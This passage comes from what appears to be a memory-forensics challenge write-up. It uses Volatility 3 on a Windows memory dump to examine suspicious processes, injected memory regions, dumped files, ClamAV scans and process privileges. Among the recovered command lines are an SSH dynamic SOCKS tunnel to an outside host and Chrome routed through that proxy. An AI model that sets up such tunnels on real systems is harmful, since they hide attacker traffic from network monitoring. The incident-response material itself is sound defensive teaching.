</pre><div><br /></div></div></div><div><br /></div></div><div>With each of the suspicious processes identified. We can go through the same process for all.</div><div>1. Get the command line</div><div>2. Get the DLLs the process was using</div><div>3. Perform a file scan</div><div>4. Attempt to dump files</div><div>5. Get the environment variables</div><div>6. Get the SIDs</div><div>7. Get the Handles</div><div>8 . Attempt to find malware in the process</div><div>9. Look at the privileges the process was running with</div><div>10. Look at the windows registry</div><div><br /></div><div>We more than likely will not follow this pattern, but it is something you may want to do. In incident response, you pivot based on the evidence you have or encounter. </div><div><br /></div><div>Let start with the process command lines.</div><div><br /></div><div>Extracting all the command lines and writing them to a file:</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><span style="color: #fcff01;">windows.cmdline.CmdLine > cmdline.txt</span><span style="color: white;">
Progress: 100.00 PDB scanning finished</span>
</pre></div></div><div><br /></div></div><div><div><b>Q</b>: Looking at the processes you considered as suspicious, did you find anything interesting in the command line?</div><div><br /></div><div><b>A</b>: I did not find anything that immediately stood out. I however, added <i>PID 4444</i> and <i>4668 </i>to this list as we can see SSH being used to setup a "dynamic" proxy on port 9999, using username kali to connect to the host on <i>10.0.0.110</i>. Remember, <i>10.0.0.110</i> is an IP address we saw above. Also, notice - "<i>-N</i>"? This is will not return a SSH terminal. Meaning there is no intention to authenticate and interact with this host via a terminal.</div><div><br /></div><div>At the same time, it is not Everday, we see chrome.exe being run from the command line. This command line also ties into the ssh session at PID <i>4444</i>. Looks like chrome.exe traffic is being proxied through the device at <i>10.0.0.110 </i>on port <i>9999</i>.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">grep --perl-regexp '896|8724|7164|5176|4940|7072|2460|644|4852|3032|4728|6152|4444|4668' cmdline.txt
5896 SgrmBroker.exe C:\Windows\system32\Sgrm\SgrmBroker.exe
7164 vmtoolsd.exe "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
2460 WindowsTermina "C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.12.10983.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe"
4728 powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6152 cmd.exe Required memory at 0xb247af2020 is inaccessible (swapped)
4444 ssh.exe ssh -D 9999 kali@10.0.0.110 -N -vvv
644 powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
4668 chrome.exe chrome.exe --proxy-server="socks5://127.0.0.1:9999"
4852 powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
3032 cmd.exe C:\Windows\System32\cmd.exe
5176 cmd.exe Required memory at 0x62a2d2020 is not valid (process exited?)
4940 cmd.exe C:\Windows\system32\cmd.exe
896 ncat.exe Required memory at 0x846628 is inaccessible (swapped)
8724 cmd.exe Required memory at 0x2f23020 is inaccessible (swapped)
7072 cmd.exe C:\Windows\system32\cmd.exe</span>
</pre></div></div><div><br /></div></div><div><div>Having not found anything interesting in the command line of those "suspicious" processes, we might have wanted to give up. However, we did find signs of possible proxying going on. </div><div><br /></div><div>Outside of the proxying, I am lacking enough evidence to strengthen my suspicion. Truly disappointed but this is how things go. I was really hoping to find the smoking gun(s) in the command line but that was not to be. Still sticking with my suspicious processes.</div><div><br /></div><div>Since there was not enough meaningful information found from the command line, let's see if the <i>malfind </i>plugin finds anything from the processes we considered suspicious.</div><div><br /></div><div>Malfind helps us to find malware that has been injected to or is hidden in user mode memory. <i>malfind</i>, helps us to detect malware that standard tools do not see. We can look at the page permissions and VAD tags for example.</div><div><br /></div><div>There are a couple of approaches here, we can test each PID one at a time such as:</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.malfind.Malfind --pid 896</span>
</pre></div></div><div><br /></div></div><div>Or we can add multiple:</div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.malfind.Malfind --pid 896 6148</span>
</pre><div><br /></div></div></div><div><br /></div></div><div>Let's take the last route so we can run all the PIDs through at one time. Let's start off by getting them all on one line, separated by a space:</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat suspicious_processes.txt | awk --field-separator=' ' '{ print $2 }' | tr '\n' ' '
896 6148 8724 5896 7164 5176 4940 7072 1364 2460 644 2692 5736 2352 1684 4852 3032 4728 6152</span>
</pre></div></div><div><br /></div></div><div>Using the previously generated list of PIDs, we see the following:</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.malfind.Malfind --pid 896 6148 8724 5896 7164 5176 4940 7072 1364 2460 644 2692 5736 2352 1684 4852 3032 4728 615
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
PID Process Start VPN End VPN Tag Protection CommitCharge PrivateMemory File output Hexdump Disasm
7164 vmtoolsd.exe 0x1b986d60000 0x1b986d91fff VadS PAGE_EXECUTE_READWRITE 50 1 Disabled
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
0x1b986d60000: add byte ptr [rax], al
...
7164 vmtoolsd.exe 0x1b987d90000 0x1b987dc1fff VadS PAGE_EXECUTE_READWRITE 50 1 Disabled
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
0x1b987d90000: add byte ptr [rax], al
...
From above, it seems malicious code has been injected in the vmtoolds.exe process starting at memory address 0x1b986d60000 and ending at 0x1b986d91fff. We see "VadS", meaning there is no memory mapped file occuping this space.
Similarly, we see below the suspicious code in Powershell with PID 4852 at 0x7df4d16b0000
4852 powershell.exe 0x7df4d16b0000 0x7df4d16bffff VadS PAGE_EXECUTE_READWRITE 1 1 Disabled
00 00 00 00 00 00 00 00 ........
78 0d 00 00 00 00 00 00 x.......
0c 00 00 00 49 c7 c2 00 ....I...
00 00 00 48 b8 10 e8 16 ...H....
4c f8 7f 00 00 ff e0 49 L......I
c7 c2 01 00 00 00 48 b8 ......H.
10 e8 16 4c f8 7f 00 00 ...L....
ff e0 49 c7 c2 02 00 00 ..I.....
0x7df4d16b0000: add byte ptr [rax], al
...</span>
</pre><div><br /></div></div></div><div><br /></div></div><div><div>This information is helpful. When we initially looked at process tree, the vmtoolsd.exe process at <i>PID 7164</i>, there was a concern as to why this process spawned multiple <i>cmd.exe</i></div><div><br /></div><div>With this in place, time for the questions</div><div><br /></div><div><b>Q:</b> Which of your suspicious processes seems to have malware injected or hidden code in user mode memory?</div><div><b>A:</b> We seem to be making progress at this point. Our initial analysis showed concern about <i>vmtoolsd.exe</i> with PID 7164 spawning multiple <i>cmd.exe</i>. </div><div><br /></div><div>Similarly, we see powershell.exe with PID 4852, spawned by Windows Terminal as having malware. Initially, I did not have a concern about this but now I do. </div><div><br /></div><div>Revisiting these processes. At this point, suspicion can be pointed to both parent and child.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat pstree.txt | grep --perl-regexp '7164|4852|2460'
*** 7164 1100 vmtoolsd.exe 0xe78bf431e080 12 - 1 False 2023-11-16 19:25:21.000000 N/A
**** 5176 7164 cmd.exe 0xe78bf52e9080 0 - 1 False 2023-11-16 22:03:58.000000 2023-11-16 22:06:04.000000
**** 4940 7164 cmd.exe 0xe78bf05391c0 1 - 1 False 2023-11-16 22:12:51.000000 N/A
**** 7072 7164 cmd.exe 0xe78bf59e01c0 1 - 1 False 2023-11-16 23:01:17.000000 N/A
*** 2460 1100 WindowsTermina 0xe78bf4f240c0 16 - 1 False 2023-11-16 20:04:59.000000 N/A
**** 644 2460 powershell.exe 0xe78bf5287080 9 - 1 False 2023-11-16 21:16:12.000000 N/A
**** 2692 2460 OpenConsole.ex 0xe78bf65680c0 5 - 1 False 2023-11-16 21:42:53.000000 N/A
**** 5736 2460 OpenConsole.ex 0xe78bf3b880c0 5 - 1 False 2023-11-16 20:05:01.000000 N/A
**** 2352 2460 OpenConsole.ex 0xe78bf46eb0c0 5 - 1 False 2023-11-16 21:16:12.000000 N/A
**** 1684 2460 OpenConsole.ex 0xe78bf63380c0 5 - 1 False 2023-11-16 21:42:18.000000 N/A
**** 4852 2460 powershell.exe 0xe78bf46770c0 9 - 1 False 2023-11-16 21:42:18.000000 N/A
**** 3032 2460 cmd.exe 0xe78bf4e2a080 1 - 1 False 2023-11-16 21:42:53.000000 N/A
**** 4728 2460 powershell.exe 0xe78bf4f900c0 10 - 1 False 2023-11-16 20:05:01.000000 N/A</span>
</pre></div></div><div><br /></div></div><div><div>For now, let's stay focused on the <i>vmtoolsd.exe</i> with PID 7164 and the PowerShell with PID 4852. We can't investigate everything, so let's prioritize and focus on these two for now.</div><div><br /></div><div>With suspicious code found, let's dump these out.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.malfind --pid 7164 4852 --dump</span>
</pre></div></div><div><br /></div></div><div>Verifying the created files</div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">ls pid.* -l
-rw------- 1 kali kali 65536 Nov 24 10:45 pid.4852.vad.0x7df4d16b0000-0x7df4d16bffff.dmp
-rw------- 1 kali kali 204800 Nov 24 10:45 pid.7164.vad.0x1b986d60000-0x1b986d91fff.dmp
-rw------- 1 kali kali 204800 Nov 24 10:45 pid.7164.vad.0x1b987d90000-0x1b987dc1fff.dmp</span>
</pre><div><br /></div></div></div><div><br /></div></div><div>Interesting, passing these files through ClamAV did not produce any signs of maliciousness.</div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">clamscan pid.*
Loading: 17s, ETA: 0s [========================>] 8.68M/8.68M sigs
Compiling: 4s, ETA: 0s [========================>] 41/41 tasks
/home/kali/CHALLENGES/TOTAL_RECALL_2024/pid.4852.vad.0x7df4d16b0000-0x7df4d16bffff.dmp: OK
/home/kali/CHALLENGES/TOTAL_RECALL_2024/pid.7164.vad.0x1b986d60000-0x1b986d91fff.dmp: OK
/home/kali/CHALLENGES/TOTAL_RECALL_2024/pid.7164.vad.0x1b987d90000-0x1b987dc1fff.dmp: OK
----------- SCAN SUMMARY -----------
Known viruses: 8679505
Engine version: 1.0.1
Scanned directories: 0
Scanned files: 3
Infected files: 0
Data scanned: 0.52 MB
Data read: 0.45 MB (ratio 1.16:1)
Time: 23.106 sec (0 m 23 s)
Start Date: 2023:11:24 11:43:10
End Date: 2023:11:24 11:43:33</span>
</pre></div></div><div><br /></div></div><div><div>Interesting! Nothing marked as suspicious. </div><div>At this point, we should have identified potential malware has been injected in two one or more processes. </div><div><br /></div><div><b>Q:</b> What is the permission on the memory regions?</div><div><b>A:</b> PAGE_EXECUTE_READWRITE permissions</div><div><br /></div><div><b>Q:</b> How many memory regions reported as having injected code based on your suspicious PIDs</div><div><b>A:</b> 3</div><div><br /></div><div><b>Q:</b> What is the size of the memory regions which contains the memory.</div><div><b>A:</b> 204800 and 65536</div><div><br /></div><div>There are 3 memory regions all with PAGE_EXECUTE_READWRITE permissions.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">ls pid.* -l
-rw------- 1 kali kali 65536 Nov 24 10:45 pid.4852.vad.0x7df4d16b0000-0x7df4d16bffff.dmp
-rw------- 1 kali kali 204800 Nov 24 10:45 pid.7164.vad.0x1b986d60000-0x1b986d91fff.dmp
-rw------- 1 kali kali 204800 Nov 24 10:45 pid.7164.vad.0x1b987d90000-0x1b987dc1fff.dmp</span>
</pre></div></div><div><br /></div></div><div><div>Since no concerns were raised let's look at this from a different perspective. Let's dump files for these processes.</div><div><br /></div><div>First create a directory</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$</span><span style="color: white;">mkdir pid 7164
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ mkdir 4852</span>
</pre></div></div><div><br /></div></div><div><div>Taking a snapshot view of the extracted files:</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --output-dir 7164/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles.DumpFiles --pid 7164
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
ImageSectionObject 0xe78bf4c4b390 mfc140enu.dll file.0xe78bf4c4b390.0xe78bf4724af0.ImageSectionObject.mfc140enu.dll.img
DataSectionObject 0xe78bf448f8b0 oleaccrc.dll file.0xe78bf448f8b0.0xe78bf43a04f0.DataSectionObject.oleaccrc.dll.dat
DataSectionObject 0xe78bf352b300 cversions.2.db file.0xe78bf352b300.0xe78bf32f71f0.DataSectionObject.cversions.2.db.dat
DataSectionObject 0xe78bf352b300 cversions.2.db file.0xe78bf352b300.0xe78bf32f71f0.DataSectionObject.cversions.2.db.dat
DataSectionObject 0xe78bf5512d10 msxml3r.dll file.0xe78bf5512d10.0xe78bf4f4d0b0.DataSectionObject.msxml3r.dll.dat
DataSectionObject 0xe78bf2f8d770 crypt32.dll.mui file.0xe78bf2f8d770.0xe78bf2d3c570.DataSectionObject.crypt32.dll.mui.dat
DataSectionObject 0xe78bf3529a00 msxml6r.dll file.0xe78bf3529a00.0xe78bf3a0d360.DataSectionObject.msxml6r.dll.dat
..............
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir 4852/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles.DumpFiles --pid 4852 | more
Volatility 3 Framework 2.5.2 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf37c5b80 winnlsres.dll file.0xe78bf37c5b80.0xe78bf3a0d720.DataSectionObject.winnlsres.dll.dat
DataSectionObject 0xe78bf37c5ea0 winnlsres.dll.mui file.0xe78bf37c5ea0.0xe78bf3a0d0e0.DataSectionObject.winnlsres.dll.mui.dat
DataSectionObject 0xe78bf2f8d770 crypt32.dll.mui file.0xe78bf2f8d770.0xe78bf2d3c570.DataSectionObject.crypt32.dll.mui.dat
ImageSectionObject 0xe78bf3fe36a0 System.Numerics.dll file.0xe78bf3fe36a0.0xe78bf0fd2210.ImageSectionObject.System.Numerics.dll.img
ImageSectionObject 0xe78bf5523b60 Microsoft.PowerShell.PSReadLine.dll file.0xe78bf5523b60.0xe78bf2ed1d00.ImageSectionObject.Microsoft.PowerShe
ll.PSReadLine.dll.img
...........................</span>
</pre><div><br /></div></div></div><div><br /></div></div><div><div>Run all of these files through ClamAV. But first ensure ClamAV is up-to-date.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span><span style="color: white;">└─$ sudo freshclam --show-progress
Thu Dec 14 10:13:04 2023 -> ClamAV update process started at Thu Dec 14 10:13:04 2023
Thu Dec 14 10:13:04 2023 -></span><b><span style="color: #fcff01;"> daily.cld database is up-to-date</span></b><span style="color: white;"> (version: 27123, sigs: 2048780, f-level: 90, builder: raynman)
Thu Dec 14 10:13:04 2023 -> main.cvd database is up-to-date (version: 62, sigs: 6647427, f-level: 90, builder: sigmgr)
Thu Dec 14 10:13:04 2023 -> bytecode.cvd database is up-to-date (version: 334, sigs: 91, f-level: 90, builder: anvilleg)</span></span>
</pre></div></div><div><br /></div></div><div>Now scan the files again.</div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">clamscan 7164/* 4852/*
Loading: 18s, ETA: 0s [========================>] 8.68M/8.68M sigs
Compiling: 3s, ETA: 0s [========================>] 41/41 tasks</span>
</pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">....</span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">----------- SCAN SUMMARY -----------
Known viruses: 8680656
Engine version: 1.0.3
Scanned directories: 0
Scanned files: 232
</span><b><span style="color: #fcff01;">Infected files: 0
</span></b><span style="color: white;">Data scanned: 263.46 MB
Data read: 297.22 MB (ratio 0.89:1)
Time: 246.675 sec (4 m 6 s)
Start Date: 2023:12:14 10:14:36
End Date: 2023:12:14 10:18:43</span></pre></div></div><div><br /></div></div><div>Well isn't this depressing!! Nothing being reported as suspicious. While depressing, it is not surprising. If we go back above, we see Microsoft Defender was the EDR producing running at the time of this capture. We could assume if these files were seen as malicious by Defender, it would have acted on them. At this point because of high suspicion, I would still take this device offline as while the security tools have not validated "maliciousness", I have enough evidence to make a decision. This device <i>10.0.0.108 </i>and the neighboring devices at <i>10.0.0.101</i> and <i>10.0.0.110 </i>should be taken offline. The map previously seen in the network statistics section shows there are established connections with these hosts.</div><div><div><br /></div><div><b>Q:</b> What privileges is the VMWare process at PID <i>7164 </i>running with?</div><div><b>A:</b> Get the privileges these vmtoolsd.exe with PID <i>7164 </i>is running with </div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.privileges.Privs --pid 7164</span></b><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
PID Process Value Privilege Attributes Description
7164 vmtoolsd.exe 2 SeCreateTokenPrivilege Create a token object
7164 vmtoolsd.exe 3 SeAssignPrimaryTokenPrivilege Replace a process-level token
7164 vmtoolsd.exe 4 SeLockMemoryPrivilege Lock pages in memory
7164 vmtoolsd.exe 5 SeIncreaseQuotaPrivilege Increase quotas
7164 vmtoolsd.exe 6 SeMachineAccountPrivilege Add workstations to the domain
7164 vmtoolsd.exe 7 SeTcbPrivilege Act as part of the operating system
7164 vmtoolsd.exe 8 SeSecurityPrivilege Manage auditing and security log
7164 vmtoolsd.exe 9 SeTakeOwnershipPrivilege Take ownership of files/objects
7164 vmtoolsd.exe 10 SeLoadDriverPrivilege Load and unload device drivers
7164 vmtoolsd.exe 11 SeSystemProfilePrivilege Profile system performance
7164 vmtoolsd.exe 12 SeSystemtimePrivilege Change the system time
7164 vmtoolsd.exe 13 SeProfileSingleProcessPrivilege Profile a single process
7164 vmtoolsd.exe 14 SeIncreaseBasePriorityPrivilege Increase scheduling priority
7164 vmtoolsd.exe 15 SeCreatePagefilePrivilege Create a pagefile
7164 vmtoolsd.exe 16 SeCreatePermanentPrivilege Create permanent shared objects
7164 vmtoolsd.exe 17 SeBackupPrivilege Backup files and directories
7164 vmtoolsd.exe 18 SeRestorePrivilege Restore files and directories
7164 vmtoolsd.exe 19 SeShutdownPrivilege Present Shut down the system
7164 vmtoolsd.exe 20 SeDebugPrivilege Debug programs
7164 vmtoolsd.exe 21 SeAuditPrivilege Generate security audits
7164 vmtoolsd.exe 22 SeSystemEnvironmentPrivilege Edit firmware environment values
7164 vmtoolsd.exe 23 SeChangeNotifyPrivilege Present,Enabled,Default Receive notifications of changes to files or directories
7164 vmtoolsd.exe 24 SeRemoteShutdownPrivilege Force shutdown from a remote system
7164 vmtoolsd.exe 25 SeUndockPrivilege Present Remove computer from docking station
7164 vmtoolsd.exe 26 SeSyncAgentPrivilege Synch directory service data
7164 vmtoolsd.exe 27 SeEnableDelegationPrivilege Enable user accounts to be trusted for delegation
7164 vmtoolsd.exe 28 SeManageVolumePrivilege Manage the files on a volume
7164 vmtoolsd.exe 29 SeImpersonatePrivilege Impersonate a client after authentication
7164 vmtoolsd.exe 30 SeCreateGlobalPrivilege Default Create global objects
7164 vmtoolsd.exe 31 SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller
7164 vmtoolsd.exe 32 SeRelabelPrivilege Modify the mandatory integrity level of an object
7164 vmtoolsd.exe 33 SeIncreaseWorkingSetPrivilege Present Allocate more memory for user applications
7164 vmtoolsd.exe 34 SeTimeZonePrivilege Present Adjust the time zone of the computer's internal clock
7164 vmtoolsd.exe 35 SeCreateSymbolicLinkPrivilege Required to create a symbolic link
7164 vmtoolsd.exe 36 SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session.</span>
</pre><div><br /></div></div></div><div><br /></div></div><div><div><b>Q:</b> What privileges is the PowerShell process at <i>4852 </i>running with?</div><div><b>A:</b> Looking at the PowerShell process at <i>4852 </i>also:<br /><br /></div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.privileges.Privs --pid 4852</span></b><span style="color: white;"> | sed '1,4d'
4852 powershell.exe 2 SeCreateTokenPrivilege Create a token object
4852 powershell.exe 3 SeAssignPrimaryTokenPrivilege Replace a process-level token
4852 powershell.exe 4 SeLockMemoryPrivilege Lock pages in memory
4852 powershell.exe 5 SeIncreaseQuotaPrivilege Present Increase quotas
4852 powershell.exe 6 SeMachineAccountPrivilege Add workstations to the domain
4852 powershell.exe 7 SeTcbPrivilege Act as part of the operating system
4852 powershell.exe 8 SeSecurityPrivilege Present Manage auditing and security log
4852 powershell.exe 9 SeTakeOwnershipPrivilege Present Take ownership of files/objects
4852 powershell.exe 10 SeLoadDriverPrivilege Present Load and unload device drivers
4852 powershell.exe 11 SeSystemProfilePrivilege Present Profile system performance
4852 powershell.exe 12 SeSystemtimePrivilege Present Change the system time
4852 powershell.exe 13 SeProfileSingleProcessPrivilege Present Profile a single process
4852 powershell.exe 14 SeIncreaseBasePriorityPrivilege Present Increase scheduling priority
4852 powershell.exe 15 SeCreatePagefilePrivilege Present Create a pagefile
4852 powershell.exe 16 SeCreatePermanentPrivilege Create permanent shared objects
4852 powershell.exe 17 SeBackupPrivilege Present Backup files and directories
4852 powershell.exe 18 SeRestorePrivilege Present Restore files and directories
4852 powershell.exe 19 SeShutdownPrivilege Present Shut down the system
4852 powershell.exe 20 SeDebugPrivilege Present,Enabled Debug programs
4852 powershell.exe 21 SeAuditPrivilege Generate security audits
4852 powershell.exe 22 SeSystemEnvironmentPrivilege Present Edit firmware environment values
4852 powershell.exe 23 SeChangeNotifyPrivilege Present,Enabled,Default Receive notifications of changes to files or directories
4852 powershell.exe 24 SeRemoteShutdownPrivilege Present Force shutdown from a remote system
4852 powershell.exe 25 SeUndockPrivilege Present Remove computer from docking station
4852 powershell.exe 26 SeSyncAgentPrivilege Synch directory service data
4852 powershell.exe 27 SeEnableDelegationPrivilege Enable user accounts to be trusted for delegation
4852 powershell.exe 28 SeManageVolumePrivilege Present Manage the files on a volume
4852 powershell.exe 29 SeImpersonatePrivilege Present,Enabled,Default Impersonate a client after authentication
4852 powershell.exe 30 SeCreateGlobalPrivilege Present,Enabled,Default Create global objects
4852 powershell.exe 31 SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller
4852 powershell.exe 32 SeRelabelPrivilege Modify the mandatory integrity level of an object
4852 powershell.exe 33 SeIncreaseWorkingSetPrivilege Present Allocate more memory for user applications
4852 powershell.exe 34 SeTimeZonePrivilege Present Adjust the time zone of the computer's internal clock
4852 powershell.exe 35 SeCreateSymbolicLinkPrivilege Present Required to create a symbolic link
4852 powershell.exe 36 SeDelegateSessionUserImpersonatePrivilege Present Obtain an impersonation token for another user in the same session.</span>
